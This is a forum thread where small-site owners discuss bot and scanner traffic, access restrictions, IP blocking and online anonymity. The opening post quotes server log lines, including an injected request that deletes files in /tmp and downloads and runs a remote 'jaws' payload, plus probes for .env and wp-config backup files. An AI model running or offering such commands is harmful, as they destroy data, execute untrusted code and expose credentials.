Home Entrance Everyone Wiki Search Login Register

Welcome, Guest. Please login or register. - Thinking of joining the forum??
May 01, 2024 - @986.96 (what is this?)
Forum activity rating: Four Star Posts: 91/1k.beats Unread Topics | Unread Replies | Own Posts | Own Topics | Random Topic | Recent Posts
News: :ozwomp: Reminder: Forum messages stay readable for years! Keep yours high quality! :ozwomp:

+  MelonLand Forum
|-+  World Wild Web
| |-+  ✁ ∙ Web Crafting
| | |-+  how do you feel about website access?


« previous next »
Pages: [1] Print
Author Topic: how do you feel about website access?  (Read 705 times)
j
Full Member ⚓︎
***


bleh bleh *gargle gargle*


View Profile WWW

First 1000 Members!Joined 2023!
« on: November 05, 2023 @616.72 »

daily, i get requests to my site like this:

Quote
"GET / HTTP/1.1" 200 726 "-" "A company searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: email"

... and this:

Quote
"GET /shell?cd+/tmp;rm+-rf+*;wget+IP/jaws;sh+/tmp/jaws HTTP/1.1"

sometimes i get blocks of requests from the same agent:

Quote
"GET /.env HTTP/1.1"
"GET /wp-config.php.bak HTTP/1.1"
"GET /wp-config.php~ HTTP/1.1"
"GET /phpinfo.php HTTP/1.1"
"GET /info.php HTTP/1.1"
"GET /.vscode/sftp.json HTTP/1.1"
"GET /sftp-config.json HTTP/1.1"

... sent minutes apart, regardless of whether they get a 200.



the above doesn't particularly affect security, now that internet software behemoths like apache, nginx and lighttpd exist. yet these redundant requests can still hinder servers my friends run, where structures like dial-up still exist (or folks that use nearlyfreespeech.net!), and where the number of requests you receive matters as much as the amount of data that's being transferred. the web is still extraordinarily heavy compared to protocols like spartan, nex and justtext, and all of the folks i've spoken to that self-host have reported receiving the same requests as the above when i've asked them.

my answer to the above is to add walls to my site:

- visitors email me asking for access to the site and telling me a little bit about why they're interested in reading - a little bit of human connection!
- i respond with a key they can append to their URL which lets them see content (i.e. http://website.com?key=letmein)
- agents trying to access my domain have three lifetime do-overs - where they can make a bad request - before their IP is permanently blacklisted

this has worked pretty well with my code (which folks can email me for) at least.

how do other folks feel about this? do you think defending your website aligns with what the web is now; if so how would you approach mitigating the sheer amount of bloat and bots that scrape sites? would my approach deter you from visiting my site if it were implemented?
« Last Edit: November 05, 2023 @619.62 by j » Logged

i go by j, she/they :)
Melooon
Hero Member ⚓︎
*****


So many stars!

SpaceHey: Friend Me!
StatusCafe: melon
iMood: Melonking
Itch.io: My Games

View Profile WWW

Always My PalFirst 1000 Members!spring 2023!Squirtle!!!!MIDI WarriorMIDI Warrior1234 Posts!OzspeckCool Dude AwardRising Star of the Web AwardMessage BuddyPocket Icelogist!OG! Joined 2021!The Smallest Ozwomp Known To ManBug!
« Reply #1 on: November 05, 2023 @652.58 »

That's a fun solution, and it definitely opens the door for you to play with the idea a bit and make your site more unique! I assume if you're giving everyone personal access keys then you can also code the site to personalise itself to each key? Maybe make their name appear or allow them to have a favourite colour that changes the design  :grin: You could even make a personalised newsletter that emails them only things they haven't read.

Although.. I suppose on the flip side to that, you'd also have to track each personal access key to log what individuals are reading on your site  :tongue: (Im not denouncing this, used altruistically this is great info for any writer/blogged, but it does run the risk of spoiling the writers direction of interest! It may also deter some people from visiting.)

As far as I know the Neocities approach is to simply overwhelm bots with resources - e.g. if you have 500 visitors and 5000 bots, then you make your server able to handle 20,000 visitors/bots.

That's an approach I tend to try and replicate; I always make sure that there are at least 3x more resources than necessary since the pain of things going offline at a bad moment is more than the pain of providing the resources.

That's definitely not a good approach for anyone self-hosting on dialup or using a very low-power server; but for anyone using VPS hosting its a viable system. There is always a limit to the number of bots that can exist since they suffer exactly the same bandwidth limits web hosts do, so I suppose they will always balance each other out  :eyes:
Logged


everything lost will be recovered, when you drift into the arms of the undiscovered
brisray
Full Member ⚓︎
***



View Profile WWW

First 1000 Members!Joined 2023!
« Reply #2 on: November 08, 2023 @592.58 »

Just my tuppence worth, I find any sort of restriction on me viewing a website puts me off of it for a long time. I do sign up for sites, but only if they have enough viewable content to make me interested in what else they have.

Just some thoughts on traffic and bots in general...

The second you open a computer up on the web the bots will find it. I found that out over 20 years ago. They just don't crawl the sites, I've had automated attacks against both the web and FTP servers I run. Although I've hardened the servers as much as I can, I am certain I couldn't stop a determined attack against them.

I've been playing around with my old web logs, even in 2011, the oldest I've still got, bots were responsible for twice the number of visits as humans - well, almost all humans, it's hard to tell if I missed some. June 2011 - 8,449 pages (human) vs 17,476 (bots). It's only gotten worse October 2023 - 34,100 (human) vs 918,543 (bots).

The server (Apache) can easily cope with the traffic - I keep track of that as well, and my ISP hasn't complained about the bandwidth usage. If you're using dial-up then it might be a problem.

If the bots get too much, I'll send them off somewhere - maybe the black hole of 0.0.0.0 or a Japanese porn site or something.

The largest bot visits I get are my own fault. A startup penetration testing company made me an offer I couldn't refuse - free scans for life! Once a month they crawl every file on my largest site as well as poke around to see if they can get out of the server. Guess what my biggest security risk is? Making the logs and server status page public - too much information about what's going on behind the public face of the sites.

Logged
j
Full Member ⚓︎
***


bleh bleh *gargle gargle*


View Profile WWW

First 1000 Members!Joined 2023!
« Reply #3 on: November 16, 2023 @712.43 »

i appreciate the ideas!

Quote from: Melooon
... you can also code the site to personalise itself to each key?

that's a really good idea that i hadn't thought of - though i'll leave that up to somebody with a more creative site than i. i'm going to work on a minimalist webserver soon that incorporates the original idea so my code will be reachable somewhere eventually!

the approach i'm planning on taking is very bland and uncreative, but could be modified: i just plan on disconnecting the user without serving any data, given that i'm working with plain old TCP/IP. there'll be a tmpfile() somewhere that keeps track of requested 404s per device; when too many are requested they'll just be dropped, which saves a ton of resources!

i like the ideas and considerations, though :P
Logged

i go by j, she/they :)
dirtnap
Casual Poster
*


View Profile

First 1000 Members!Joined 2023!
« Reply #4 on: December 02, 2023 @460.59 »

on the actual problem: this isn't about palo alto's detested crawler, is it? the one that flagrantly ignores robots.txt?

are you not able to block access to your server according to user-agent? because frankly, if not, i'd say that's the bigger issue here. since this crawler's ua is comically recognisable, it should be possible to block any request containing the phrase "expanse, a palo alto", or for that matter probably just "palo alto".

i think blocking the offending crawler (whcih again, should be simple to do via the recognisable ua) is a much more reasonable response to the problem of one crawler requesting too much traffic than...denying everyone access to your site.

because in response to your final question:

Quote
would my approach deter you from visiting my site if it were implemented?

i would think "well that's a novel way to harvest emails", close the tab, and forget about your site.

any site that requires me to do anything to view it beyond select a language loses my interest immediately. i'm certainly not handing over my email just to fucking read. i'm extremely tired of forums that require an account to view, and i'm certainly not making an account to view whatever your site is - and yes, requiring someone to send an email and get a unique key is in any functional sense making an account.
Logged

no js no shoes no problem
j
Full Member ⚓︎
***


bleh bleh *gargle gargle*


View Profile WWW

First 1000 Members!Joined 2023!
« Reply #5 on: December 02, 2023 @566.04 »

nope - not /just/ palo alto! i get a bunch of requests which don't share a consistent pattern of identification, so i would have to fall back upon a big list of (hopefully static) IPs that i'd block access to my site. the issue there is time; eventually those IPs would belong to other people who could be left scratching their heads when they get a 403.

some extra context for why i created this post:

Spoiler
whilst this topic is entirely hypothetical, it's also oriented around my hosting experience and my plans for hosting in the future. sometime next year i plan on transitioning from renting a VPS monthly to using nearlyfreespeech.net for everything - partly because everything's packaged in one place which doesn't use a subscription-based model /or/ contracts. i can put all of my files in one place, top up my balance and forget about it - much like my phone.

nearlyfreespeech doesn't permit the hosting of non-web software which doesn't speak the HTTP protocol - so my intention is to "de-bloat" the way HTTP works by stripping it down to its essentials; you'd only be able to send GET requests concatenated with a path - and SSL (amongst other things) would be entirely unsupported. this works for me - and as long as other web browsers can access a page without issue, i'm not really fussed that it breaks web standards. all i have to do is get the OK from nearlyfreespeech, write a server and sign up, then i'm set to go.

the issue with this is that nearlyfreespeech charges based on bandwidth, server resources and storage. the latter two i can mitigate by writing clean code (oh boy are asynchronous requests not going to exist on my server! just like how phones used to work in the 90s; folks are going to have an operator [the server] that connects folks one-by-one in order, until a timeout) and - well - i don't need to compensate for storage because my files are already tiny enough for it to not be an issue. the biggest problem is bandwidth. how i'm imagining my software right now is with my money in mind: if you request a non-existent page three times in a row then you'll be blocked for a month. instead of returning some arbitrary response code (that's three whole bytes of data - mind you!), you'll just be disconnected as soon as you connect to the server. if you're already on the no fly list that is, so to speak. because i don't mind: i'd probably write a little shellscript to delete the blocked IP list on a weekly basis.

emailing would really be a last step solution to mitigating traffic that i'd only implement if i absolutely had to.
[close]

Quote from: dirtnap
any site that requires me to do anything to view it beyond select a language loses my interest immediately. i'm certainly not handing over my email just to fucking read. i'm extremely tired of forums that require an account to view, and i'm certainly not making an account to view whatever your site is - and yes, requiring someone to send an email and get a unique key is in any functional sense making an account.

it's great to hear somebody as against accounts as i am, but i'd be interested to hear just how far your adamancy extends before you have to compromise, and compare your experience to mine!

for instance, you're on Melonland - and i would assume that you have at least a couple of accounts on sites that governments (or whoever) have forced you to register with (i know i have!). should password managers even exist? similarly, chan boards are known for being not-the-best which is often attributed to their anonymity - do you think that pushing content to the web (in whichever form, websites included) should require something that defeats your anonymity? if so: why do you have this mindset - is it because you don't trust whoever is at the other end to keep your data secure and away from third-party fingerprinting, or is it because it's inconvenient to register for a site - or some other reason?

anyway, the biggest issue with website access is that its multifaceted, like all cybersecurity is. i can't write the perfect server that accounts for all the issues i'll ever have or ever could have - because that doesn't exist and never will because there are far too many bad actors. the web has been going so long now that its principles outright contradict one another. why would you ever trust a client to consider your robots.txt but also suspect your client enough to require a user-agent? i'm sure that the latter exists for debugging purposes because browsers have different implementations - but at that point why do seperate browsers exist? surely, as long as the same javascript version is shared, and the same binary format is shared [for stuff like images], then we don't need to have firefox, librewolf, links, lynx, badwolf, qutebrowser, opera, chrome, edge, internet explorer, elinks, dillo, brave, netsurf, safari, chromium, icecat, palemoon, seamonkey, w3m, vivaldi ... you see my point?  that's a bit of a tangent - but i hope that this last paragraph clarifies how this isn't just a response to being fed up with a bunch of crawler requests - it's an attempt to both fix and personalize the web to me.
Logged

i go by j, she/they :)
dirtnap
Casual Poster
*


View Profile

First 1000 Members!Joined 2023!
« Reply #6 on: December 03, 2023 @460.34 »

i misunderstood, i thought the majority of your bot traffic was palo alto. there have been reports of their crawlers getting stuck in a loop and making the exact same request hundreds of times in short order. and then repeating that multiple times a day.

in this case, i can understand needing to take stricter measures.

Quote
if you request a non-existent page three times in a row then you'll be blocked for a month.

personally, i'd trial a week and then dial the block-time up if you still feel you're responding to too many requests. in principle, though, an automatic ip ban with an expiration is certainly one of the least drastic solutions i could think of for this problem. i'd be very interested in learning how it works out for you once it's set up.

it's great to hear somebody as against accounts as i am, but i'd be interested to hear just how far your adamancy extends before you have to compromise, and compare your experience to mine!

interesting! alright. i'd say that broadly i'm resistant to having to interact with a site beyond the most basic interactions necessary to view it. when cookie banners became A Thing i reconfigured my adblocker to hide them because the simple act of clicking "agree" or "close" or whatever was just a step too far for me. not that clicking those was too great a physical effort or anything, just that i didn't like being forced to acknowledge it in any way. i didn't want the servers to have the satisfaction of recieving that response.

if that sounds petty, i wouldn't disagree. i'm very resistant to doing what's expected of me (when i have not previously assented that this expectation can be made), to the point that it's probably a personality flaw.


Quote from: j
for instance, you're on Melonland - and i would assume that you have at least a couple of accounts on sites that governments (or whoever) have forced you to register with (i know i have!).

i would attribute my making an account here entirely to the fact that i could read the forums freely without one. i read quite a lot before i made an account, and i still do mostly read while logged out.

tangentially to this, quite a lot of forums i used to frequent have gone login-to-view, which, despite the fact that i have accounts there of old, has dissuaded me from logging in again. i think, i should check up on this forum! oh. need to login.

nevermind.

as for my government (or whatever) forcing me to make an account...i'm assuming you mean web accounts because, depending on how you look at it, having a national insurance number functionally is having an account with my government.

funnily enough, i don't think i do?

i'm welsh, and both the welsh and english governments (wales isn't entirely devolved and still takes much of its law and governmental stuff from england) are quite enthusiastic about making things available online but thus far nothing is exclusively online, at least not that i'm aware of.

for example, the government has its own official petition site. (discourse about that set aside for brevity) it's certainly an effective tool for ensuring that there is one(1) petition for something. if everyone is signing the same petition, you do increase the efficacy of any given petition. however...you're not required to use it. you can still run petitions on paper the old-fashioned way, without involving the website at all.

i'm vaguely aware that a lot of government stuff like taxes, benefits, nhs, and housing can be handled online now but i say vaguely because i've never even looked at the webportal(s) for these things. i have no interest in adding another point of failure for such vital aspects of my continued existence, let alone personal data. (i do not trust the government's cybersecurity, or cyber-anything for that matter)

the most recent census could apparently be filled in online, the thought of which horrifies me for the aforementioned reason. i filled in the paper one that came in the post.

Quote from: j
should password managers even exist?

the first time i heard of a password manager, i thought "what a brilliant scam". i couldn't believe they were real things that were genuinely designed to help. you install this thing in your browser, and let it keep (and/or invent for you) a list of user/pass for every site you visit. does this not look exactly like those datamining and adware toolbars that used to plague browsers to anyone else?

i'm aware that (at least some, there probably are some scam ones out there by now) password managers were created out of a genuine desire to help improve some user's security. but i still can't beleive anyone with any real interest in security trusts them. it feels self-defeating to keep a singular database of all your credentials and then trust literally any third party with that database.

indeed, the cloud-based ones have already suffered the predictable leaks.

i don't think password managers as a concept are an inherently bad idea. but i do think all current iterations of such are bad ideas. i think password managers should be standalone software, that doesn't even attempt to access the internet, and which upon installation adds blacklist rules to the local firewall that actively prevents any in/out requests (for the sake of defeating at least the easiest approach to penetration).

even so, i think the concept of a digital password manager on the same device you're using those passwords on is...questionable. that's just asking for trouble.

my password manager is a book. an actual, physical, paper book. the thing i've been taught for decades is the worst possible approach to security.

it's fucking foolproof.

you can't download my book. you can't see it in teamview. it is absolutely impossible for you to know what is in my password book because it isn't digital.

seriously, if you struggle to remember your passwords, just write them down on actual paper.

(i'm aware this is poor security if you work in an office. i'm talking about individual use)




Quote from: j
similarly, chan boards are known for being not-the-best which is often attributed to their anonymity - do you think that pushing content to the web (in whichever form, websites included) should require something that defeats your anonymity?

i used to be a frequenter of various anonymous message boards (not only but certainly including chan-boards) and sometimes still am in places like dreamwidth where anonymous communities continue to thrive.

people who think chan-boards are bad because of the anonymity have it backwards. they're anonymous because they're bad.

they're anonymous because no-one wants to tie themselves concretely to the kind of things their post is proximate to, even if their own post is entirely innocent.

plenty of anon communities continue to thrive without being anything close to the chan-boards in terms of content or meanness simply because...that's not what they're about.

even chan-boards have admins that ban people for violating rules, because they do have rules.

the difference between chan-boards and dreamwidth anon communities is what is and isn't against the rules.

also, formal rules and admins aside, anon communities are often self-policing. if you say something that the community deems unacceptable, the community will deal with you as they see fit. even if they have no power to remove your post, or to ban you, they can tell you, en masse, exactly what was wrong with what you said.

it's a more powerful tool than you might expect. ten, twenty replies to your post all saying some variation of "we don't use that word here" and otherwise ignoring anything else you said...most problem posters either adjust, or leave.

the few that turn troll are handled by the mods.

i made a melonland account because i considered it to be a fair bargain: my email address for permission to participate in what is, essentially, a collaborative art project in the form of a community.

but if i could post here anonymously, i wouldn't have taken that deal. where anonymity is an option, i will usually choose it.

actually, i'd go so far as to say reddit is still an anonymouse platform. sure, you need an account to post, but you don't need an email for an account. you can just make an account and not give an email.

throwaways are a whole thing on reddit. people make single-use accounts for discussing one particular topic, for posting one comment or thread. sometimes they're deleted after the fact, sometimes they're just abandoned forever.

they're functionally anonymous.

even when you post somewhere anonymously, you're still giving your ip, or at least an ip.

really, creating a no-email account on reddit is just making it so the public see an arbitrary name you decide instead of your ip.

in fact, "being an ip" is a whole thing in some communities. have you ever looked in the wikipedia forums? yeah, wikipedia has forums. because of dynamic ips, you can't be certain that the ip you're talking to today is the same user you were talking to last month. and quite often, it genuinely isn't.

Quote from: j
if so: why do you have this mindset - is it because you don't trust whoever is at the other end to keep your data secure and away from third-party fingerprinting, or is it because it's inconvenient to register for a site - or some other reason?

the inconvenience is always at least part of my reckoning, and depending on the percieved inconvenience:gain ratio that alone can be enough for me to say "fuck that" and leave.

to some considerable degree it is not trusting the other end with my data. sometimes i assume they want my data for nefarious purposes. big companies like google and adobe come to mind for that. sometimes, even if i believe they have no bad intentions, i still don't trust them to keep it secure.

my sentiment is fairly linear: the fewer databases any given piece of information about me is in, the fewer chances there are for that data to leak.

even if the data is incredibly minor, i still either avoid giving it or give fake data wherever possible.

i don't think any website has my real date of birth, nor do they need it. asking for an exact date is unnecessary. i miss the days of "are you over 18" buttons. the outcome is the same. anyone can lie. but now you've got a database of dates of birth for no good reason.

(as an aside, i despise that all government departments will take knowing my date of birth as proof i am who i say i am. the thing that most people tell their friends! is used as proof of identity! it's fucking idiotic)

the vast majority of steam users were born on the 1st of january, somehow. weird coincidence. wonder why that could be.

i buy digital things quite often. or at least i used to, less so these days. still, when i buy a digital thing, i'm often asked for completely unnecessary information, like my address.

always, i give a blatantly fake address, because you don't need my physical address to email me a fucking zip. (yeah it's for tax reasons or something. i don't care. you're still not getting my address. figure out your tax data by the country my ip shows, it's not hard.)

Quote from: j
anyway, the biggest issue with website access is that its multifaceted, like all cybersecurity is. i can't write the perfect server that accounts for all the issues i'll ever have or ever could have - because that doesn't exist and never will because there are far too many bad actors. the web has been going so long now that its principles outright contradict one another. why would you ever trust a client to consider your robots.txt but also suspect your client enough to require a user-agent? i'm sure that the latter exists for debugging purposes because browsers have different implementations - but at that point why do seperate browsers exist? surely, as long as the same javascript version is shared, and the same binary format is shared [for stuff like images], then we don't need to have firefox, librewolf, links, lynx, badwolf, qutebrowser, opera, chrome, edge, internet explorer, elinks, dillo, brave, netsurf, safari, chromium, icecat, palemoon, seamonkey, w3m, vivaldi ... you see my point?  that's a bit of a tangent - but i hope that this last paragraph clarifies how this isn't just a response to being fed up with a bunch of crawler requests - it's an attempt to both fix and personalize the web to me.

i understand, and i think i appreciate the Crawler Struggle is bigger than i realised






Logged

no js no shoes no problem
j
Full Member ⚓︎
***


bleh bleh *gargle gargle*


View Profile WWW

First 1000 Members!Joined 2023!
« Reply #7 on: March 07, 2024 @467.00 »

well! it's been almost four months and i finally got around to making my custom web server that incorporates some of this!

i didn't actually decide to go down the email / tailored key route - the points above really impacted the way i went about things! here's how the server - tinyhtml - works:

- accepts one connection at a time
- fetches data from peer
- checks that the request is a GET request
- tries to open the requested document
- serves 200 / 404 & document content (if any)
- closes connection

most scrapers rely on the web server to redirect from "GET /" to "GET /index.html", which is great for me because the server can absolutely open "/" and will serve one byte of data upon request, meaning that i can share my domain without worry now; only clients that request "index.html" can see what i've written!

on top of this, i've realized that trying to implement a ban system is convoluted and not the way forward. instead, i've just written a neat riddle on my homepage that folks need to solve to find any interesting stuff i've written :)
Logged

i go by j, she/they :)
Pages: [1] Print 
« previous next »
 

Vaguely similar topics! (3)

Website size

Started by RolyBoard ✁ ∙ Web Crafting

Replies: 59
Views: 5451
Last post March 30, 2024 @910.61
by Semper
Website example page

Started by Icey!Board ☆ ∙ Showcase & Links

Replies: 3
Views: 1864
Last post December 16, 2021 @285.10
by cinni
Website status (Check replies for part 2)

Started by Icey!Board ☆ ∙ Showcase & Links

Replies: 8
Views: 2079
Last post December 26, 2021 @841.50
by Icey!

Melonking.Net © Always and ever was! SMF 2.0.19 | SMF © 2021, Simple Machines | Terms and Policies Forum Guide | Rules | RSS | WAP2


MelonLand Badges and Other Melon Sites!

MelonLand Project! Visit the MelonLand Forum! Support the Forum
Visit Melonking.Net! Visit the Gif Gallery! Pixel Sea TamaNOTchi